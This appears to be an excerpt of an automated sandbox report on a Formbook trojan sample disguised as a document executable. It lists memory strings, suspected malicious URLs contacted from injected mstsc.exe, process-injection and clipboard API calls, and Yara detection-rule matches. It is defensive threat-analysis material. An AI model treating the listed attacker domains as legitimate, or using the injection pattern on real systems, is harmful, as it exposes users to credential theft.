            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000557C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.00000000032CC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000284B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4143406843.0000000002842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000284B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000282B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000003.00000003.1963406635.00000000076F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mstsc.exe, 00000003.00000002.4145420454.0000000005D56000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003AA6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FpP_8%3DnzWo
            Source: mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000570E000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.000000000345E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3Q
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000607A000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003DCA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00767099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00767099
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00767294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00767294
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00767099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00767099
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00754342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00754342
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0077F5D0

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007129C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_007129C2
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007802AA NtdllDialogWndProc_W,0_2_007802AA
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077E769 NtdllDialogWndProc_W,CallWindowProcW,0_2_0077E769
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077EA4E NtdllDialogWndProc_W,0_2_0077EA4E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0077ECBC
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072AC99 NtdllDialogWndProc_W,0_2_0072AC99
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,0_2_0072AD5C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072AFB4 GetParent,NtdllDialogWndProc_W,0_2_0072AFB4
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0077EFA8
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F0A1 SendMessageW,NtdllDialogWndProc_W,0_2_0077F0A1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0077F122
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F37C NtdllDialogWndProc_W,0_2_0077F37C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F3DA NtdllDialogWndProc_W,0_2_0077F3DA
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F3AB NtdllDialogWndProc_W,0_2_0077F3AB
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F45A ClientToScreen,NtdllDialogWndProc_W,0_2_0077F45A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F425 NtdllDialogWndProc_W,0_2_0077F425
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0077F5D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077F594 GetWindowLongW,NtdllDialogWndProc_W,0_2_0077F594
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072B7F2 NtdllDialogWndProc_W,0_2_0072B7F2
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072B845 NtdllDialogWndProc_W,0_2_0072B845
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077FE80 NtdllDialogWndProc_W,0_2_0077FE80
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_0077FF04
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_0077FF91
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C553 NtClose,1_2_0042C553
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372B60 NtClose,LdrInitializeThunk,1_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033735C0 NtCreateMutant,LdrInitializeThunk,1_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03374340 NtSetContextThread,1_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03374650 NtSuspendThread,1_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372BA0 NtEnumerateValueKey,1_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372B80 NtQueryInformationFile,1_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372BF0 NtAllocateVirtualMemory,1_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372BE0 NtQueryValueKey,1_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372AB0 NtWaitForSingleObject,1_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372AF0 NtWriteFile,1_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372AD0 NtReadFile,1_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372F30 NtCreateSection,1_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372F60 NtCreateProcessEx,1_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372FB0 NtResumeThread,1_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372FA0 NtQuerySection,1_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372F90 NtProtectVirtualMemory,1_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372FE0 NtCreateFile,1_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372E30 NtWriteVirtualMemory,1_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372EA0 NtAdjustPrivilegesToken,1_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372E80 NtReadVirtualMemory,1_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372EE0 NtQueueApcThread,1_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D30 NtUnmapViewOfSection,1_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D10 NtMapViewOfSection,1_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D00 NtSetInformationFile,1_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DB0 NtEnumerateKey,1_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DD0 NtDelayExecution,1_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C00 NtQueryInformationProcess,1_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C70 NtFreeVirtualMemory,1_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C60 NtCreateKey,1_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CA0 NtQueryInformationToken,1_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CF0 NtOpenProcess,1_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CC0 NtQueryVirtualMemory,1_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373010 NtOpenDirectoryObject,1_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373090 NtSetValueKey,1_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033739B0 NtGetContextThread,1_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D10 NtOpenProcessToken,1_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D70 NtOpenThread,1_2_03373D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04594650 NtSuspendThread,LdrInitializeThunk,3_2_04594650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04594340 NtSetContextThread,LdrInitializeThunk,3_2_04594340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04592C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C60 NtCreateKey,LdrInitializeThunk,3_2_04592C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04592CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04592D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04592D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DD0 NtDelayExecution,LdrInitializeThunk,3_2_04592DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04592DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04592EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04592E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F30 NtCreateSection,LdrInitializeThunk,3_2_04592F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FE0 NtCreateFile,LdrInitializeThunk,3_2_04592FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FB0 NtResumeThread,LdrInitializeThunk,3_2_04592FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AD0 NtReadFile,LdrInitializeThunk,3_2_04592AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AF0 NtWriteFile,LdrInitializeThunk,3_2_04592AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592B60 NtClose,LdrInitializeThunk,3_2_04592B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04592BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04592BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04592BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045935C0 NtCreateMutant,LdrInitializeThunk,3_2_045935C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045939B0 NtGetContextThread,LdrInitializeThunk,3_2_045939B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C00 NtQueryInformationProcess,3_2_04592C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CC0 NtQueryVirtualMemory,3_2_04592CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CF0 NtOpenProcess,3_2_04592CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D00 NtSetInformationFile,3_2_04592D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DB0 NtEnumerateKey,3_2_04592DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592E30 NtWriteVirtualMemory,3_2_04592E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592EA0 NtAdjustPrivilegesToken,3_2_04592EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F60 NtCreateProcessEx,3_2_04592F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F90 NtProtectVirtualMemory,3_2_04592F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FA0 NtQuerySection,3_2_04592FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AB0 NtWaitForSingleObject,3_2_04592AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592B80 NtQueryInformationFile,3_2_04592B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593010 NtOpenDirectoryObject,3_2_04593010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593090 NtSetValueKey,3_2_04593090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593D70 NtOpenThread,3_2_04593D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593D10 NtOpenProcessToken,3_2_04593D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02668EE0 NtCreateFile,3_2_02668EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669330 NtAllocateVirtualMemory,3_2_02669330
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669040 NtReadFile,3_2_02669040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669130 NtDeleteFile,3_2_02669130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026691D0 NtClose,3_2_026691D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_0075702F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74775590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_0074B9F1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007582D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007582D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: String function: 00737750 appears 42 times
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: String function: 0072F885 appears 68 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0332B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03387E54 appears 99 times
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 04595130 appears 58 times
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 0454B970 appears 262 times
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 045CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 045A7E54 appears 107 times
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 045DF290 appears 103 times
            Source: DOC092024-0431202229487.exe, 00000000.00000003.1690165268.0000000004EF3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DOC092024-0431202229487.exe
            Source: DOC092024-0431202229487.exe, 00000000.00000003.1689928244.000000000509D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DOC092024-0431202229487.exe
            Source: DOC092024-0431202229487.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
